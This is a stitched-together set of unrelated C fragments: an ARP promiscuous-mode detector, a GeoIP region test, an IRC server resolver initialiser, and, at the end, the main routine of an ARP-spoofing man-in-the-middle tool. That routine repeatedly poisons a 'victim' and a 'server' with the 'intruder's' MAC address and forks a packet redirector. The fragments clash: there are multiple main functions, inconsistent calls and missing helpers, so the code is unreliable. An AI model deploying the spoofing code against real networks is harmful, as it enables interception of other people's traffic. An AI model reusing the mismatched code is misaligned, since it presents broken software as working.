static void
getaddr(struct sockaddr **dst, int *len, char *name, char *port)
{
if (*name == '/') {
unixaddr(dst, len, name);
return;
}
inetaddr(dst, len, name, port);
}
void
main (int argc, char **argv)
{
int rec;
int len, from_len, rsflags;
struct ifreq if_data;
struct sockaddr from;
u_int8_t myMAC[6];
u_int32_t myIP, myNETMASK, myBROADCAST, ip, dip;
if (getuid () != 0)
{
perr ("You must be root to run this program!\n");
exit (0);
}
if (argc != 2)
{
fprintf(stderr,"Usage: %s eth0\n", argv[0]);
exit (0);
}
if ((rec = socket (AF_INET, SOCK_PACKET, htons (ETH_P_ARP))) < 0)
{
perror("socket");
exit (0);
}
printf ("----------------------------------------------------------\n");
strcpy (if_data.ifr_name, argv[1]);
if (ioctl (rec, SIOCGIFHWADDR, &if_data) < 0) {
perr ("can't get HW addres of my interface!\n");
exit(1);
}
memcpy (myMAC, if_data.ifr_hwaddr.sa_data, 6);
printf ("> My HW Addr: %s\n", hwaddr (myMAC));
if (ioctl (rec, SIOCGIFADDR, &if_data) < 0) {
perr ("can't get IP addres of my interface!\n");
exit(1);
}
memcpy ((void *) &ip, (void *) &if_data.ifr_addr.sa_data + 2, 4);
myIP = ntohl (ip);
printf ("> My IP Addr: %s\n", inetaddr(ip));
if (ioctl (rec, SIOCGIFNETMASK, &if_data) < 0)
perr ("can't get NETMASK addres of my interface!\n");
memcpy ((void *) &ip, (void *) &if_data.ifr_netmask.sa_data + 2, 4);
myNETMASK = ntohl (ip);
printf ("> My NETMASK: %s\n", inetaddr(ip));
if (ioctl (rec, SIOCGIFBRDADDR, &if_data) < 0)
perr ("can't get BROADCAST addres of my interface!\n");
memcpy ((void *) &ip, (void *) &if_data.ifr_broadaddr.sa_data + 2, 4);
myBROADCAST = ntohl (ip);
printf ("> My BROADCAST: %s\n", inetaddr(ip));
if ((rsflags = fcntl (rec, F_GETFL)) == -1)
{
perror ("fcntl F_GETFL");
exit (1);
}
if (fcntl (rec, F_SETFL, rsflags | O_NONBLOCK) == -1)
{
perror ("fcntl F_SETFL");
exit (1);
}
printf ("----------------------------------------------------------\n");
printf ("> Scanning ....\n");
for (dip = (myIP & myNETMASK) + 1; dip < myBROADCAST; dip++)
{
bzero(full_packet, MAX_PACK_LEN);
memcpy (arp_pkt.dst_mac, "\0\6\146\3\23\67", 6); /*
00:06:66:03:13:37 :) */
memcpy (arp_pkt.src_mac, myMAC, 6);
arp_pkt.pkt_type = htons( ETH_P_ARP );
arp_pkt.hw_type = htons( 0x0001 );
arp_pkt.hw_len = 6;
arp_pkt.pro_type = htons( 0x0800 );
arp_pkt.pro_len = 4;
arp_pkt.arp_op = htons (ARPREQUEST);
memcpy (arp_pkt.sender_eth, myMAC, 6);
ip = htonl (myIP);
memcpy (arp_pkt.sender_ip, &ip, 4);
memcpy (arp_pkt.target_eth, "\0\0\0\0\0\0", 6);
ip = htonl (dip);
memcpy (arp_pkt.target_ip, &ip, 4);
strcpy(from.sa_data, argv[1]);
from.sa_family = 1;
if( sendto (rec, full_packet, sizeof (struct arp_struct), 0, &from,
sizeof(from)) < 0)
perror ("sendto");
usleep (333);
len = recvfrom (rec, full_packet, MAX_PACK_LEN, 0, &from,
&from_len);
if (len <= ETHER_HEADER_LEN)
continue;
memcpy (&ip, arp_pkt.target_ip, 4);
if (ntohs (arp_pkt.arp_op) == ARPREPLY
&& ntohl (ip) == myIP)
{
memcpy (&ip, arp_pkt.sender_ip, 4);
printf ("*> Host %s, %s **** Promiscuous mode detected !!!\n",
inetaddr (ip),
hwaddr (arp_pkt.sender_eth));
}
}
printf ("> End.\n");
exit (0);
}
int main()
{
GeoIP *gi;
GeoIPRegion *gir, giRegion;
FILE *f;
char ipAddress[30];
char expectedCountry[3];
char expectedCountry3[4];
const char *time_zone;
gi = GeoIP_open("../data/GeoIPRegion.dat", GEOIP_MEMORY_CACHE);
if (gi == NULL) {
fprintf(stderr, "Error opening database\n");
exit(1);
}
f = fopen("region_test.txt", "r");
if (f == NULL) {
fprintf(stderr, "Error opening region_test.txt\n");
exit(1);
}
gir = GeoIP_region_by_addr(gi, "10.0.0.0");
if (gir != NULL) {
printf("lookup of private IP address: country = %s, region = %s\n",
gir->country_code, gir->region);
}
while (fscanf(f, "%s%s%s", ipAddress, expectedCountry, expectedCountry3) !=
EOF) {
printf("ip = %s\n", ipAddress);
gir = GeoIP_region_by_name(gi, ipAddress);
if (gir != NULL) {
time_zone =
GeoIP_time_zone_by_country_and_region(gir->country_code,
gir->region);
printf("%s, %s, %s, %s\n",
gir->country_code,
(!gir->region[0]) ? "N/A" : gir->region,
_mk_NA(GeoIP_region_name_by_code
(gir->country_code,
gir->region)), _mk_NA(time_zone));
} else {
printf("NULL!\n");
}
GeoIP_assign_region_by_inetaddr(gi, inetaddr(ipAddress), &giRegion);
if (gir != NULL) {
assert(giRegion.country_code[0]);
assert(!strcmp(gir->country_code, giRegion.country_code));
if (gir->region[0]) {
assert(giRegion.region[0]);
assert(!strcmp(gir->region, giRegion.region));
} else {
assert(!giRegion.region[0]);
}
} else {
assert(!giRegion.country_code[0]);
}
if (gir != NULL) {
GeoIPRegion_delete(gir);
}
}
GeoIP_delete(gi);
fclose(f);
return 0;
}
int init_resolver(int op)
{
int ret = 0;
#ifdef LRAND48
srand48(time(NULL));
#endif
if (op & RES_INITLIST)
{
bzero((char *)&reinfo, sizeof(reinfo));
first = last = NULL;
}
if (op & RES_CALLINIT)
{
ret = ircd_res_init();
if (!ircd_res.nscount)
{
ircd_res.nscount = 1;
#ifdef INET6
if (!inetpton(AF_INET6, "::1",
&ircd_res.nsaddr_list[0].sin6_addr.s6_addr))
{
bcopy(minus_one,
ircd_res.nsaddr_list[0].sin6_addr.s6_addr,
IN6ADDRSZ);
}
#else
ircd_res.nsaddr_list[0].sin_addr.s_addr =
inetaddr("127.0.0.1");
#endif
}
}
if (op & RES_INITSOCK)
{
int on = 0;
ret = resfd = socket(AFINET, SOCK_DGRAM, 0);
(void) SETSOCKOPT(ret, SOL_SOCKET, SO_BROADCAST, &on, on);
/* The following frame is a hack to allow resolving
* in FreeBSD jail(). As it is harmless elsewhere, it is
* not #ifdef-ed.
* Note that currently IPv6 within jail() is not
* supported by the FreeBSD.
*/
{
struct SOCKADDR_IN res_addr;
memset(&res_addr, 0, sizeof(res_addr));
res_addr.SIN_FAMILY = AFINET;
#ifdef INET6
res_addr.sin6_addr = in6addr_any;
#else
res_addr.sin_addr.s_addr = htonl(INADDR_ANY);
#endif
bind(resfd, (SAP) &res_addr, sizeof(res_addr));
}
}
#ifdef DEBUG
if (op & RES_INITDEBG);
ircd_res.options |= RES_DEBUG;
#endif
if (op & RES_INITCACH)
{
bzero((char *)&cainfo, sizeof(cainfo));
bzero((char *)hashtable, sizeof(hashtable));
}
if (op == 0)
ret = resfd;
return ret;
}
int main (int argc, char **argv)
{
struct ifreq if_data;
int sockd;
/* IPs & MACs */
unsigned int S_ip[4];
unsigned int S_mac[6];
unsigned int V_ip[5];
unsigned int V_mac[6];
unsigned int I_ip[4];
unsigned int I_mac[6];
u_int32_t local_ip;
if (argc!=3)
{
printf ("%s ip_server ip_victim\n", argv[0]);
exit(EXIT_FAILURE);
}
/* Read params */
sscanf (argv[1], "%d.%d.%d.%d", &S_ip[0], &S_ip[1], &S_ip[2], &S_ip[3]);
sscanf (argv[2], "%d.%d.%d.%d", &V_ip[0], &V_ip[1], &V_ip[2], &V_ip[3]);
/* server's MAC */
sscanf (getmacfromarpcache(argv[1]) ,"%2X:%2X:%2X:%2X:%2X:%2X",
&S_mac[0], &S_mac[1], &S_mac[2], &S_mac[3], &S_mac[4], &S_mac[5]);
/* victim's MAC */
sscanf (getmacfromarpcache(argv[2]) ,"%2X:%2X:%2X:%2X:%2X:%2X",
&V_mac[0], &V_mac[1], &V_mac[2], &V_mac[3], &V_mac[4], &V_mac[5]);
if ((sockd = socket (AF_INET, SOCK_DGRAM, 0)) < 0)
{
perror("socket");
exit (0);
}
strcpy (if_data.ifr_name, "eth0");
/* Intruder's MAC */
if (ioctl (sockd, SIOCGIFHWADDR, &if_data) < 0)
{
perror ("ioctl(): SIOCGIFHWADDR \n");
exit(EXIT_FAILURE);
}
memcpy (I_mac, if_data.ifr_hwaddr.sa_data, 6);
/* Intruder's IP */
if (ioctl (sockd, SIOCGIFADDR, &if_data) < 0) {
perror ("ioctl(); SIOCGIFADDR \n");
exit(EXIT_FAILURE);
}
memcpy ((void *) &local_ip, (void *) &if_data.ifr_addr.sa_data + 2, 4);
sscanf (inetaddr(local_ip), "%d.%d.%d.%d",
&I_ip[0], &I_ip[1], &I_ip[2], &I_ip[3]);
printf("\n\n %s\t\t%s \n" \
" (S) _____ _____ (V) \n" \
" \\ / \n" \
" \\ / \n" \
" \\ / \n" \
" | \n" \
" (I) \n" \
" %s \n\n\n",
argv[1], argv[2], inetaddr(local_ip) );
int pid = fork();
if (pid < 0)
{
printf ("fork()");
exit(EXIT_FAILURE);
}
if (pid != 0)
{
while (1)
{
/* Tell victim that "Server's IP" has "Intruder's MAC" */
send_arp_packet(I_mac, S_ip, V_mac, V_ip);
/* Tell server that "Victim's IP" has "Intruder's MAC" */
send_arp_packet (I_mac, V_ip, S_mac, S_ip);
sleep(1);
}
}
else
{
redirect_packet(I_mac, S_mac, S_ip, V_mac, V_ip );
}
return 0;
}
